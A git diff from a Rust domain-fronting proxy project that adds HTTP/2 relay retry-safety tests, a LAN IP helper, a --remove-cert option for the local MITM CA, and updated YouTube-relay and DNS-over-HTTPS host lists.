+                    .unwrap();
+                (resp, Vec::new())
+            } else {
+                assert_eq!(req.uri().path(), "/next", "second hop must follow Location");
+                let resp = http::Response::builder().status(200).body(()).unwrap();
+                (resp, b"final".to_vec())
+            }
+        })
+        .await;
+
+        let send = h2c_client(addr).await;
+        let fronter = fronter_for_test(false);
+
+        let (status, _hdrs, body) = fronter
+            .run_h2_relay_with_send(
+                send,
+                /* generation */ 1,
+                "/start",
+                Bytes::new(),
+                TEST_RESPONSE_DEADLINE,
+            )
+            .await
+            .expect("h2 relay should follow redirect to 200");
+        assert_eq!(status, 200);
+        assert_eq!(body, b"final");
+        // Successful round-trip must increment h2_calls.
+        assert_eq!(fronter.h2_calls.load(Ordering::Relaxed), 1);
+        assert_eq!(fronter.h2_fallbacks.load(Ordering::Relaxed), 0);
+        server_handle.abort();
+    }
+
+    #[tokio::test(flavor = "current_thread")]
+    async fn run_h2_relay_with_send_reports_request_sent_no_on_dead_connection() {
+        // Set up an h2c client whose connection is severed before we
+        // call run_h2_relay_with_send. The first `send.ready().await`
+        // inside h2_round_trip should fail — RequestSent::No is the
+        // correct classification (stream never opened on the wire).
+        let listener = tokio::net::TcpListener::bind("127.0.0.1:0").await.unwrap();
+        let addr = listener.local_addr().unwrap();
+        let server_task = tokio::spawn(async move {
+            // Accept the connection, do the h2 handshake, then drop.
+            // After drop the client's SendRequest will fail at ready().
+            let (sock, _) = listener.accept().await.unwrap();
+            let _connection = h2::server::handshake(sock).await.unwrap();
+            // Hold briefly so client can complete handshake, then drop.
+            tokio::time::sleep(Duration::from_millis(50)).await;
+        });
+
+        let send = h2c_client(addr).await;
+        // Wait for server to drop.
+        server_task.await.unwrap();
+        tokio::time::sleep(Duration::from_millis(50)).await;
+
+        let fronter = fronter_for_test(false);
+        let result = fronter
+            .run_h2_relay_with_send(
+                send,
+                1,
+                "/x",
+                Bytes::from_static(b"some-body"),
+                TEST_RESPONSE_DEADLINE,
+            )
+            .await;
+        match result {
+            Err((_, RequestSent::No)) => {} // expected
+            Err((e, RequestSent::Maybe)) => {
+                panic!("dead-conn failure classified as Maybe (unsafe to retry): {}", e)
+            }
+            Ok(_) => panic!("expected error against dropped server"),
+        }
+        // Failure must increment h2_fallbacks counter.
+        assert_eq!(fronter.h2_fallbacks.load(Ordering::Relaxed), 1);
+        assert_eq!(fronter.h2_calls.load(Ordering::Relaxed), 0);
+    }
+
+    #[tokio::test(flavor = "current_thread")]
+    async fn run_h2_relay_with_send_reports_request_sent_maybe_on_post_send_reset() {
+        // Server accepts headers (so the request reaches it) and then
+        // resets the stream. The client sees a stream error AFTER
+        // send_request returned Ok. RequestSent::Maybe is the only
+        // safe classification — Apps Script may have started executing.
+        let listener = tokio::net::TcpListener::bind("127.0.0.1:0").await.unwrap();
+        let addr = listener.local_addr().unwrap();
+        let server_task = tokio::spawn(async move {
+            let (sock, _) = listener.accept().await.unwrap();
+            let mut connection = h2::server::handshake(sock).await.unwrap();
+            if let Some(Ok((_req, mut respond))) = connection.accept().await {
+                // Reset the stream after receiving headers — simulates
+                // the server starting to process and then bailing
+                // (matches the "Apps Script started UrlFetchApp then
+                // failed" scenario).
+                respond.send_reset(h2::Reason::INTERNAL_ERROR);
+            }
+            // Keep the connection alive briefly so the client sees the
+            // RST_STREAM rather than a connection-level close.
+            tokio::time::sleep(Duration::from_millis(100)).await;
+        });
+
+        let send = h2c_client(addr).await;
+        let fronter = fronter_for_test(false);
+        let result = fronter
+            .run_h2_relay_with_send(
+                send,
+                1,
+                "/x",
+                Bytes::from_static(b"body"),
+                TEST_RESPONSE_DEADLINE,
+            )
+            .await;
+        match result {
+            Err((_, RequestSent::Maybe)) => {} // expected
+            Err((e, RequestSent::No)) => panic!(
+                "post-send RST classified as No — would let caller \
+                 unsafely replay non-idempotent request: {}",
+                e
+            ),
+            Ok(_) => panic!("expected error against RST_STREAM"),
+        }
+
+        server_task.await.unwrap();
+    }
+
+    // ─── NonRetryable wrapper + retry/fallback policy ────────────────────
+
+    #[test]
+    fn nonretryable_wrapper_is_not_retryable_other_variants_are() {
+        // Surfaces the contract that do_relay_with_retry and the
+        // exit-node fallback rely on. If this ever flips, those
+        // sites would silently start re-issuing post-send failures.
+        let plain = FronterError::Relay("transient".into());
+        assert!(plain.is_retryable(), "plain Relay error must be retryable");
+
+        let plain2 = FronterError::Timeout;
+        assert!(plain2.is_retryable(), "Timeout must be retryable");
+
+        let wrapped = FronterError::NonRetryable(Box::new(FronterError::Relay("post-send".into())));
+        assert!(!wrapped.is_retryable(), "NonRetryable must not be retryable");
+
+        // Display must be transparent so log lines look identical.
+        let inner_msg = "h2 response: stream RST".to_string();
+        let inner = FronterError::Relay(inner_msg.clone());
+        let wrapped = FronterError::NonRetryable(Box::new(inner));
+        let displayed = wrapped.to_string();
+        assert!(
+            displayed.contains(&inner_msg),
+            "transparent Display should surface inner: got {}",
+            displayed
+        );
+
+        // into_inner unwraps once.
+        let inner_again = wrapped.into_inner();
+        assert!(matches!(inner_again, FronterError::Relay(_)));
+        assert!(inner_again.is_retryable(), "unwrapped error is retryable");
+    }
+
+    // Note on test coverage gap: we don't have a deterministic test
+    // that the ready/back-pressure phase's timeout reports
+    // `RequestSent::No`. h2 client enforces remote
+    // `MAX_CONCURRENT_STREAMS` at `send_request` time rather than at
+    // `ready` time, so a "saturate the slots, expect ready to block"
+    // setup actually races down the response-phase path instead.
+    // The ready-arm code in `h2_round_trip` is small (single match
+    // arm with `RequestSent::No` literally written next to the
+    // timeout error) and covered by review. Other safety properties
+    // (post-send Maybe via stream RST, pre-send No via dead conn,
+    // NonRetryable wrap propagation) are covered by the tests above
+    // and below.
+
+    #[tokio::test(flavor = "current_thread")]
+    async fn run_h2_relay_with_send_does_not_wrap_pre_send_in_nonretryable() {
+        // Regression guard: the NonRetryable wrap is the *call site's*
+        // job (do_relay_once_with applies it for unsafe methods only).
+        // run_h2_relay_with_send returns the raw RequestSent::No so
+        // the call site can decide. If h2_relay_request started
+        // wrapping unconditionally, even safe-method requests would
+        // become non-retryable on transient pre-send failures.
+        let listener = tokio::net::TcpListener::bind("127.0.0.1:0").await.unwrap();
+        let addr = listener.local_addr().unwrap();
+        let server_task = tokio::spawn(async move {
+            let (sock, _) = listener.accept().await.unwrap();
+            let _connection = h2::server::handshake(sock).await.unwrap();
+            tokio::time::sleep(Duration::from_millis(50)).await;
+        });
+        let send = h2c_client(addr).await;
+        server_task.await.unwrap();
+        tokio::time::sleep(Duration::from_millis(50)).await;
+
+        let fronter = fronter_for_test(false);
+        let result = fronter
+            .run_h2_relay_with_send(
+                send,
+                1,
+                "/x",
+                Bytes::from_static(b"x"),
+                TEST_RESPONSE_DEADLINE,
+            )
+            .await;
+        match result {
+            Err((e, RequestSent::No)) => {
+                assert!(
+                    e.is_retryable(),
+                    "pre-send error must be raw FronterError, not pre-wrapped NonRetryable; got {:?}",
+                    e
+                );
+            }
+            other => panic!("expected (Err, RequestSent::No); got {:?}", other),
+        }
+    }
+
+    #[tokio::test(flavor = "current_thread")]
+    async fn sticky_disable_h2_for_fronting_refusal_flips_disabled_and_clears_cell() {
+        // Verify the helper that runs from each call site's 421 arm:
+        // sets h2_disabled, clears the cell, rebalances counters
+        // (h2_calls -=1 since the round-trip already counted; h2_fallbacks +=1).
+        // Tests the helper directly so we don't depend on a real h2
+        // server returning 421 — call sites already exercise the
+        // status-match wiring through code review.
+        let (addr, server_handle) = spawn_h2c_server(|_req| {
+            let resp = http::Response::builder().status(200).body(()).unwrap();
+            (resp, Vec::new())
+        })
+        .await;
+        let send = h2c_client(addr).await;
+        let fronter = fronter_for_test(false);
+        // Seed the cell so we can verify it gets cleared.
+        {
+            let mut cell = fronter.h2_cell.lock().await;
+            *cell = Some(H2Cell {
+                send: send.clone(),
+                created: Instant::now(),
+                generation: 7,
+                dead: Arc::new(AtomicBool::new(false)),
+            });
+        }
+        // Pretend a round-trip just incremented h2_calls (which is
+        // what run_h2_relay_with_send does on Ok before the call site
+        // sees the 421 status).
+        fronter.h2_calls.fetch_add(1, Ordering::Relaxed);
+
+        fronter
+            .sticky_disable_h2_for_fronting_refusal(421, "test context")
+            .await;
+
+        assert!(fronter.h2_disabled.load(Ordering::Relaxed), "must sticky-disable");
+        let cell = fronter.h2_cell.lock().await;
+        assert!(cell.is_none(), "cell must be cleared");
+        assert_eq!(
+            fronter.h2_calls.load(Ordering::Relaxed),
+            0,
+            "the h2_calls increment from the failed round-trip must be reversed"
+        );
+        assert_eq!(
+            fronter.h2_fallbacks.load(Ordering::Relaxed),
+            1,
+            "must count as a fallback"
+        );
+        drop(cell);
+
+        // Subsequent ensure_h2 must short-circuit to None without
+        // attempting to open.
+        let t0 = Instant::now();
+        assert!(fronter.ensure_h2().await.is_none());
+        assert!(
+            t0.elapsed() < Duration::from_millis(100),
+            "sticky-disabled ensure_h2 must return immediately"
+        );
+
+        // Calling the helper a second time must not log again or
+        // double-count fallbacks beyond +1 per call.
+        fronter
+            .sticky_disable_h2_for_fronting_refusal(421, "test context")
+            .await;
+        // h2_calls would underflow without the saturating guard; assert
+        // it stays at 0.
+        assert_eq!(fronter.h2_calls.load(Ordering::Relaxed), 0);
+        // h2_fallbacks goes up unconditionally (this is "another
+        // attempt that ended up on h1") — that's fine.
+        assert_eq!(fronter.h2_fallbacks.load(Ordering::Relaxed), 2);
+
+        server_handle.abort();
+    }
+
+    #[test]
+    fn is_h2_fronting_refusal_status_only_matches_421() {
+        // Guard against the helper accidentally matching ambiguous
+        // edge statuses (403 could be a real Apps Script geoblock,
+        // 4xx generally is not a "this is h2's fault" signal).
+        assert!(is_h2_fronting_refusal_status(421));
+        for s in [200, 301, 400, 403, 404, 429, 500, 502, 503] {
+            assert!(
+                !is_h2_fronting_refusal_status(s),
+                "status {} must NOT trigger sticky h2 disable",
+                s
+            );
+        }
+    }
+
+    #[tokio::test(flavor = "current_thread")]
+    async fn h2_handshake_post_tls_returns_alpn_refused_when_peer_picks_h1() {
+        // Verify the OpenH2Error::AlpnRefused path: if the TLS layer
+        // negotiated http/1.1 (not h2), the post-TLS helper must
+        // return the typed sentinel that ensure_h2 uses to sticky-
+        // disable. We construct a fake TlsStream by short-circuiting
+        // through a real local TLS server that only advertises h1.
+        //
+        // This needs a real TLS handshake (rustls + a self-signed
+        // cert), so we set up the smallest possible test server with
+        // ALPN forced to ["http/1.1"].
+        let cert = rcgen::generate_simple_self_signed(vec!["127.0.0.1".to_string()]).unwrap();
+        let cert_der = rustls::pki_types::CertificateDer::from(cert.cert.der().to_vec());
+        let key_der = rustls::pki_types::PrivateKeyDer::Pkcs8(
+            rustls::pki_types::PrivatePkcs8KeyDer::from(cert.key_pair.serialize_der()),
+        );
+
+        let mut server_cfg = rustls::ServerConfig::builder()
+            .with_no_client_auth()
+            .with_single_cert(vec![cert_der], key_der)
+            .unwrap();
+        server_cfg.alpn_protocols = vec![b"http/1.1".to_vec()];
+        let acceptor = tokio_rustls::TlsAcceptor::from(Arc::new(server_cfg));
+
+        let listener = tokio::net::TcpListener::bind("127.0.0.1:0").await.unwrap();
+        let addr = listener.local_addr().unwrap();
+        let server = tokio::spawn(async move {
+            let (sock, _) = listener.accept().await.unwrap();
+            // Drive the handshake; the test only needs the negotiation
+            // to complete with ALPN=h1. After that we can drop.
+            let _tls = acceptor.accept(sock).await.unwrap();
+            tokio::time::sleep(Duration::from_millis(50)).await;
+        });
+
+        // Client side: open TLS with ALPN advertising h2 + h1.1; the
+        // server picks h1 → alpn_protocol() returns "http/1.1" not "h2".
+        let mut client_cfg = rustls::ClientConfig::builder()
+            .dangerous()
+            .with_custom_certificate_verifier(Arc::new(NoVerify))
+            .with_no_client_auth();
+        client_cfg.alpn_protocols = vec![b"h2".to_vec(), b"http/1.1".to_vec()];
+        let connector = tokio_rustls::TlsConnector::from(Arc::new(client_cfg));
+
+        let tcp = TcpStream::connect(addr).await.unwrap();
+        let name = rustls::pki_types::ServerName::try_from("127.0.0.1").unwrap();
+        let tls = connector.connect(name, tcp).await.unwrap();
+
+        let result = DomainFronter::h2_handshake_post_tls(tls).await;
+        match result {
+            Err(OpenH2Error::AlpnRefused) => {} // expected
+            Err(other) => panic!("expected AlpnRefused, got {:?}", other),
+            Ok((_send, _dead)) => panic!("expected AlpnRefused, got Ok"),
+        }
+        server.await.unwrap();
+    }
 }
diff --git a/src/lan_utils.rs b/src/lan_utils.rs
new file mode 100644
index 00000000..bbf329f8
--- /dev/null
+++ b/src/lan_utils.rs
@@ -0,0 +1,100 @@
+//! Helpers for the "Share with other devices on my Wi-Fi / network" toggle in
+//! the desktop UI and the Android share-LAN config.
+//!
+//! `detect_lan_ip()` returns the IPv4 address that the OS would use as the
+//! source for outbound traffic (i.e. the LAN-reachable address on the
+//! interface that has the default route). The trick is to open a UDP socket,
+//! `connect()` it to a public address (no packets are actually sent during
+//! the syscall), then read the socket's bound `local_addr()` — that's the
+//! IP a peer on the LAN would use to reach this machine.
+//!
+//! Returns `None` if the host has no usable IPv4 (no network at all, or
+//! IPv6-only). Callers fall back to telling the user to figure it out
+//! themselves in that case.
+//!
+//! This is the same pattern used by `gethostbyname` callers and by every
+//! other "what's my LAN IP" helper across the ecosystem — no
+//! getifaddrs / `if_nameindex` boilerplate, no platform-specific code,
+//! works on every target the rest of mhrv-rs builds on.
+
+use std::net::{IpAddr, UdpSocket};
+
+/// Try to figure out the LAN-reachable IPv4 of the current host. See module
+/// docs for the trick. Returns `None` on any failure (no IPv4 stack, no
+/// route, etc.) — callers should treat that as "ask the user to find it
+/// themselves" rather than as an error.
+pub fn detect_lan_ip() -> Option<IpAddr> {
+    // Bind to all interfaces on a kernel-picked port. We never read or
+    // write — the socket is just a vehicle for asking the routing table
+    // which interface would carry traffic to a public IP.
+    let sock = UdpSocket::bind(("0.0.0.0", 0)).ok()?;
+    // Public IP outside any RFC-1918 range. UDP "connect" doesn't actually
+    // send anything; it just records the peer for later sendto/recv calls
+    // and tells the kernel to commit a source-address selection.
+    sock.connect(("1.1.1.1", 80)).ok()?;
+    let local = sock.local_addr().ok()?.ip();
+    // The socket's local_addr is `0.0.0.0` only when the OS hasn't
+    // committed a source address yet (rare — connect() forces commit on
+    // every modern kernel). Treat that case as "no LAN IP available."
+    match local {
+        IpAddr::V4(v4) if v4.is_unspecified() => None,
+        ip => Some(ip),
+    }
+}
+
+/// Returns `true` if the bind host string represents "all interfaces"
+/// (`0.0.0.0`, `[::]`, or an empty / whitespace-only value — empty defaults
+/// to `0.0.0.0` in the underlying socket bind on most platforms).
+///
+/// Used by the UI to decide whether the "share on LAN" checkbox should
+/// appear checked.
+pub fn is_share_on_lan(listen_host: &str) -> bool {
+    let trimmed = listen_host.trim();
+    matches!(trimmed, "0.0.0.0" | "[::]" | "::")
+}
+
+/// Returns `true` if the bind host string is loopback-only
+/// (`127.0.0.1`, `localhost`, `::1`, `[::1]`).
+pub fn is_loopback_only(listen_host: &str) -> bool {
+    let trimmed = listen_host.trim().to_ascii_lowercase();
+    matches!(trimmed.as_str(), "127.0.0.1" | "localhost" | "::1" | "[::1]")
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    #[test]
+    fn share_on_lan_recognizes_wildcards() {
+        assert!(is_share_on_lan("0.0.0.0"));
+        assert!(is_share_on_lan(" 0.0.0.0 "));
+        assert!(is_share_on_lan("[::]"));
+        assert!(is_share_on_lan("::"));
+        assert!(!is_share_on_lan("127.0.0.1"));
+        assert!(!is_share_on_lan("192.168.1.42"));
+        assert!(!is_share_on_lan(""));
+    }
+
+    #[test]
+    fn loopback_only_recognizes_local_names() {
+        assert!(is_loopback_only("127.0.0.1"));
+        assert!(is_loopback_only("localhost"));
+        assert!(is_loopback_only("LocalHost"));
+        assert!(is_loopback_only("::1"));
+        assert!(is_loopback_only("[::1]"));
+        assert!(!is_loopback_only("0.0.0.0"));
+        assert!(!is_loopback_only("192.168.1.42"));
+    }
+
+    #[test]
+    fn detect_lan_ip_returns_non_unspecified_when_online() {
+        // This test makes a UDP `connect()` to 1.1.1.1 to ask the OS what
+        // IP it would use. On a CI box with no network the connect can
+        // fail and we'd get None; on a typical dev machine we get a real
+        // address. Either result is allowed — we just verify the unwrapped
+        // value is never `0.0.0.0` (the contract).
+        if let Some(ip) = detect_lan_ip() {
+            assert!(!ip.is_unspecified(), "got unspecified address: {}", ip);
+        }
+    }
+}
diff --git a/src/lib.rs b/src/lib.rs
index 1c62a5ba..6b53a32b 100644
--- a/src/lib.rs
+++ b/src/lib.rs
@@ -5,6 +5,7 @@ pub mod cert_installer;
 pub mod config;
 pub mod data_dir;
 pub mod domain_fronter;
+pub mod lan_utils;
 pub mod mitm;
 pub mod proxy_server;
 pub mod rlimit;
diff --git a/src/main.rs b/src/main.rs
index 92bf7f46..202c7ec5 100644
--- a/src/main.rs
+++ b/src/main.rs
@@ -7,7 +7,7 @@ use std::sync::Arc;
 use tokio::sync::Mutex;
 use tracing_subscriber::EnvFilter;
 
-use mhrv_rs::cert_installer::{install_ca, is_ca_trusted};
+use mhrv_rs::cert_installer::{install_ca, is_ca_trusted, reconcile_sudo_environment, remove_ca};
 use mhrv_rs::config::Config;
 use mhrv_rs::mitm::{MitmCertManager, CA_CERT_FILE};
 use mhrv_rs::proxy_server::ProxyServer;
@@ -18,6 +18,7 @@ const VERSION: &str = env!("CARGO_PKG_VERSION");
 struct Args {
     config_path: Option<PathBuf>,
     install_cert: bool,
+    remove_cert: bool,
     no_cert_check: bool,
     command: Command,
 }
@@ -44,6 +45,11 @@ USAGE:
 OPTIONS:
     -c, --config PATH    Path to config.json (default: ./config.json)
     --install-cert       Install the MITM CA certificate and exit
+    --remove-cert        Remove the MITM CA from the OS trust store (verified by
+                         name), then delete the on-disk ca/ directory and exit.
+                         NSS cleanup (Firefox/Chrome) is best-effort. A fresh CA
+                         is generated on next run. config.json and your Apps
+                         Script deployment are untouched.
     --no-cert-check      Skip the auto-install-if-untrusted check on startup
     -h, --help           Show this message
     -V, --version        Show version
@@ -58,6 +64,7 @@ ENV:
 fn parse_args() -> Result<Args, String> {
     let mut config_path: Option<PathBuf> = None;
     let mut install_cert = false;
+    let mut remove_cert = false;
     let mut no_cert_check = false;
     let mut command = Command::Serve;
 
@@ -102,13 +109,18 @@ fn parse_args() -> Result<Args, String> {
                 config_path = Some(PathBuf::from(v));
             }
             "--install-cert" => install_cert = true,
+            "--remove-cert" => remove_cert = true,
             "--no-cert-check" => no_cert_check = true,
             other => return Err(format!("unknown argument: {}", other)),
         }
     }
+    if install_cert && remove_cert {
+        return Err("--install-cert and --remove-cert cannot be combined".into());
+    }
     Ok(Args {
         config_path,
         install_cert,
+        remove_cert,
         no_cert_check,
         command,
     })
@@ -127,6 +139,14 @@ async fn main() -> ExitCode {
     // Install default rustls crypto provider (ring).
     let _ = rustls::crypto::ring::default_provider().install_default();
 
+    // Must run before anything else reads HOME / USER / data_dir — if
+    // the user ran `sudo ./mhrv-rs ...`, this re-points HOME at the
+    // invoking user's home so user-scoped cert paths (Firefox profiles,
+    // macOS login keychain, the mhrv-rs data dir) are not silently
+    // operated against root's home. No-op on Windows and for non-sudo
+    // invocations.
+    reconcile_sudo_environment();
+
     let args = match parse_args() {
         Ok(a) => a,
         Err(e) => {
@@ -136,6 +156,29 @@ async fn main() -> ExitCode {
         }
     };
 
+    // --remove-cert runs without a valid config — the CA files may be
+    // the only thing present in the data dir. `config.json` and the
+    // Apps Script deployment are intentionally untouched: the user does
+    // not have to redeploy Code.gs after regenerating the CA.
+    if args.remove_cert {
+        init_logging("info");
+        let base = mhrv_rs::data_dir::data_dir();
+        match remove_ca(&base) {
+            Ok(outcome) => {
+                tracing::info!("{}", outcome.summary());
+                tracing::info!(
+                    "A fresh CA will be generated next time the proxy starts — \
+                     run --install-cert then to re-trust it."
+                );
+                return ExitCode::SUCCESS;
+            }
+            Err(e) => {
+                eprintln!("remove failed: {}", e);
+                return ExitCode::FAILURE;
+            }
+        }
+    }
+
     // --install-cert can run without a valid config — only needs the CA file.
     if args.install_cert {
         init_logging("info");
@@ -245,11 +288,12 @@ async fn main() -> ExitCode {
                 tracing::info!("Script ID: {}", sids[0]);
             }
         }
-        mhrv_rs::config::Mode::GoogleOnly => {
+        mhrv_rs::config::Mode::Direct => {
             tracing::warn!(
-                "google_only bootstrap: direct SNI-rewrite tunnel to {} only. \
-                 Open https://script.google.com in your browser (proxy set to \
-                 {}:{}), deploy Code.gs, then switch to apps_script mode.",
+                "direct mode: SNI-rewrite tunnel only (Google edge {} + any \
+                 configured fronting_groups). Open https://script.google.com \
+                 in your browser (proxy set to {}:{}), deploy Code.gs, then \
+                 switch to apps_script mode for full DPI bypass.",
                 config.google_ip,
                 config.listen_host,
                 config.listen_port
diff --git a/src/proxy_server.rs b/src/proxy_server.rs
index 41063057..209bbc58 100644
--- a/src/proxy_server.rs
+++ b/src/proxy_server.rs
@@ -3,6 +3,7 @@ use std::net::SocketAddr;
 use std::sync::Arc;
 use std::time::Duration;
 
+use bytes::Bytes;
 use tokio::io::{AsyncReadExt, AsyncWriteExt};
 use tokio::net::{TcpListener, TcpStream, UdpSocket};
 use tokio::sync::{mpsc, Mutex};
@@ -15,7 +16,7 @@ use tokio_rustls::rustls::server::Acceptor;
 use tokio_rustls::rustls::{ClientConfig, DigitallySignedStruct, SignatureScheme};
 use tokio_rustls::{LazyConfigAcceptor, TlsAcceptor, TlsConnector};
 
-use crate::config::{Config, Mode};
+use crate::config::{Config, FrontingGroup, Mode};
 use crate::domain_fronter::DomainFronter;
 use crate::mitm::MitmCertManager;
 use crate::tunnel_client::{decode_udp_packets, TunnelMux};
@@ -47,6 +48,18 @@ const SNI_REWRITE_SUFFIXES: &[&str] = &[
     "youtu.be",
     "youtube-nocookie.com",
     "ytimg.com",
+    // NOTE on `googlevideo.com`: v1.7.4 (#275) added this here on the
+    // theory that video chunks should bypass the Apps Script relay.
+    // **Reverted in v1.7.6** — multiple users (#275 amirabbas117, #281
+    // mrerf) reported total YouTube breakage after v1.7.4. Root cause
+    // is that googlevideo.com is served by Google's separate "EVA"
+    // edge IPs, not the regular GFE IPs that the user's `google_ip`
+    // typically points at. SNI-rewriting `googlevideo.com:443` to a
+    // GFE IP got TLS handshake / wrong-cert errors for those users.
+    // Pre-v1.7.4 behaviour (chunks via the Apps Script relay path —
+    // slow but reliable on every GFE IP) is restored. If we ever want
+    // direct googlevideo.com routing, it needs a separate config knob
+    // that lets users specify their EVA edge IP independently.
     // Google Video Transport CDN — YouTube video chunks, Chrome
     // auto-updates, Google Play Store downloads. The single biggest
     // gap vs the upstream Python port: without these in the list
@@ -72,27 +85,100 @@ const SNI_REWRITE_SUFFIXES: &[&str] = &[
     "blogger.com",
 ];
 
-/// YouTube-family suffixes. Extracted so `youtube_via_relay` config can
-/// pull them out of the SNI-rewrite dispatch at runtime.
-const YOUTUBE_SNI_SUFFIXES: &[&str] = &[
+/// YouTube hosts that should be routed through the Apps Script relay
+/// when `youtube_via_relay` is enabled — the API + HTML surfaces where
+/// Restricted Mode is actually enforced (via the SNI=www.google.com
+/// edge looking at the request). Issue #102 / #275.
+///
+/// Deliberately narrower than the YouTube section of
+/// `SNI_REWRITE_SUFFIXES`:
+///   - `youtube.com` / `youtu.be` / `youtube-nocookie.com`: HTML pages
+///     and player frames. These trigger Restricted Mode if served via
+///     the SNI rewrite, so when the flag is on we relay them.
+///   - `youtubei.googleapis.com`: the YouTube data API the player
+///     queries for video metadata + manifest. Restricted Mode also
+///     gates video availability here. Without this entry, the JSON
+///     RPC layer would still hit the SNI-rewrite tunnel via the
+///     broader `googleapis.com` suffix — the user-visible symptom of
+///     that miss is "youtube_via_relay flips on but Restricted Mode
+///     stays sticky on some videos."
+///
+/// **NOT** in this list (intentional, was a regression in #275):
+///   - `ytimg.com`: thumbnails. No Restricted Mode logic on a static
+///     image CDN; routing through Apps Script makes thumbnails slow
+///     for zero gain.
+///   - `googlevideo.com`: video chunk CDN. Routing through Apps Script
+///     means every chunk eats Apps Script quota *and* risks the 6-min
+///     execution cap aborting long videos mid-playback.
+///   - `ggpht.com`: channel/profile images, same reasoning as ytimg.
+const YOUTUBE_RELAY_HOSTS: &[&str] = &[
     "youtube.com",
     "youtu.be",
     "youtube-nocookie.com",
-    "ytimg.com",
+    "youtubei.googleapis.com",
+];
+
+/// Built-in list of DNS-over-HTTPS endpoints. CONNECTs to these (when
+/// `tunnel_doh` is left at the default of `false`, i.e. bypass enabled)
+/// skip the Apps Script tunnel and exit via plain TCP. Mix of the
+/// browser-pinned variants Chrome/Brave/Edge/Firefox/Safari use and the
+/// well-known public DoH providers users wire up by hand. Suffix
+/// matching means we don't need to enumerate every tenant subdomain
+/// (e.g. `*.cloudflare-dns.com` covers Workers-hosted DoH too).
+///
+/// Entries are matched case-insensitively. Both exact-match (`dns.google`)
+/// and dot-anchored suffix-match (a host whose suffix is `.cloudflare-dns.com`
+/// or which equals `cloudflare-dns.com`) are accepted — same shape as
+/// `passthrough_hosts`'s `.foo` rule.
+const DEFAULT_DOH_HOSTS: &[&str] = &[
+    // The base SLD covers every tenant subdomain via suffix matching;
+    // the browser-pinned variants below are listed for grep/discovery
+    // (so a user searching "chrome.cloudflare-dns.com" finds this list)
+    // and are technically redundant under cloudflare-dns.com.
+    "cloudflare-dns.com",
+    "chrome.cloudflare-dns.com",
+    "mozilla.cloudflare-dns.com",
+    "1dot1dot1dot1.cloudflare-dns.com",
+    "dns.google",
+    "dns.google.com",
+    "dns.quad9.net",
+    "dns11.quad9.net",
+    "dns.adguard-dns.com",
+    "unfiltered.adguard-dns.com",
+    "family.adguard-dns.com",
+    "dns.nextdns.io",
+    "doh.opendns.com",
+    "doh.cleanbrowsing.org",
+    "doh.dns.sb",
+    "dns0.eu",
+    "dns.alidns.com",
+    "doh.pub",
+    "dns.mullvad.net",
 ];
 
 fn matches_sni_rewrite(host: &str, youtube_via_relay: bool) -> bool {
     let h = host.to_ascii_lowercase();
     let h = h.trim_end_matches('.');
+
+    // YouTube relay carve-out runs FIRST so it wins over the broad
+    // `googleapis.com` suffix that would otherwise pull
+    // `youtubei.googleapis.com` into the SNI-rewrite path. The earlier
+    // implementation iterated SNI_REWRITE_SUFFIXES with a filter, which
+    // works for sibling entries (e.g. `youtube.com` in both lists) but
+    // not for nested ones (`youtubei.googleapis.com` matches the broad
+    // `googleapis.com` even when its specific entry is filtered out).
+    // The short-circuit here is unconditional — we don't need to check
+    // SNI rewrite once we've decided this host goes to the relay.
+    if youtube_via_relay {
+        for s in YOUTUBE_RELAY_HOSTS {
+            if h == *s || h.ends_with(&format!(".{}", s)) {
+                return false;
+            }
+        }
+    }
+
     SNI_REWRITE_SUFFIXES
         .iter()
-        .filter(|s| {
-            // If the user opted into youtube_via_relay, skip YouTube
-            // suffixes so they fall through to the Apps Script relay
-            // path. See config.rs `youtube_via_relay` docs for the
-            // trade-off. Issue #102.
-            !(youtube_via_relay && YOUTUBE_SNI_SUFFIXES.contains(s))
-        })
         .any(|s| h == *s || h.ends_with(&format!(".{}", s)))
 }
 
@@ -125,12 +211,15 @@ pub struct ProxyServer {
     host: String,
     port: u16,
     socks5_port: u16,
-    /// `None` in `google_only` (bootstrap) mode: no Apps Script relay is
-    /// wired up, only the SNI-rewrite tunnel path is live.
+    /// `None` in `direct` mode: no Apps Script relay is wired up,
+    /// only the SNI-rewrite tunnel path (Google edge + any configured
+    /// `fronting_groups`) is live.
     fronter: Option<Arc<DomainFronter>>,
     mitm: Arc<Mutex<MitmCertManager>>,
     rewrite_ctx: Arc<RewriteCtx>,
     tunnel_mux: Option<Arc<TunnelMux>>,
+    coalesce_step_ms: u64,
+    coalesce_max_ms: u64,
 }
 
 pub struct RewriteCtx {
@@ -148,6 +237,146 @@ pub struct RewriteCtx {
     /// and pass through as plain TCP (optionally via upstream_socks5).
     /// See config.rs `passthrough_hosts` for matching rules. Issues #39, #127.
     pub passthrough_hosts: Vec<String>,
+    /// If true, drop SOCKS5 UDP datagrams destined for port 443 so
+    /// callers fall back to TCP/HTTPS. See config.rs `block_quic` for
+    /// the trade-off. Issue #213.
+    pub block_quic: bool,
+    pub block_stun: bool,
+    /// If true, route DoH CONNECTs around the Apps Script tunnel via
+    /// plain TCP. Default false via `Config::tunnel_doh = true` (flipped
+    /// in v1.9.0, issue #468). See `DEFAULT_DOH_HOSTS` and
+    /// `matches_doh_host` for matching, and config.rs `tunnel_doh` for
+    /// the trade-off.
+    pub bypass_doh: bool,
+    /// When true, immediately reject connections to known DoH hosts.
+    /// Takes priority over bypass_doh.
+    pub block_doh: bool,
+    /// User-supplied DoH hostnames added to the built-in default list.
+    /// Same matching semantics as `passthrough_hosts`.
+    pub bypass_doh_hosts: Vec<String>,
+    /// Multi-edge fronting groups, resolved at startup. Each group's
+    /// `ServerName` is parsed once so the per-connection dial path
+    /// is allocation-free. Wrapped in `Arc` so a per-CONNECT match
+    /// can hand the dispatcher a refcount-clone instead of cloning
+    /// the whole struct (which holds a `Vec<String>` of normalized
+    /// domains used only for matching). Empty = feature off (only
+    /// the built-in Google edge SNI-rewrite is active).
+    pub fronting_groups: Vec<Arc<FrontingGroupResolved>>,
+}
+
+/// True if `host` matches a known DoH endpoint — either the built-in
+/// `DEFAULT_DOH_HOSTS` list or a user-supplied entry in `extra`. Match
+/// is case-insensitive, and entries match either exactly OR as a
+/// dot-anchored suffix unconditionally (no leading-dot requirement,
+/// unlike `passthrough_hosts`). The DoH list is *always* about a
+/// service — every legitimate tenant subdomain of `cloudflare-dns.com`
+/// or a user's private `doh.acme.test` is a DoH endpoint, so requiring
+/// users to remember to write `.doh.acme.test` would be a footgun
+/// without an obvious benefit.
+fn host_matches_doh_entry(h: &str, entry: &str) -> bool {
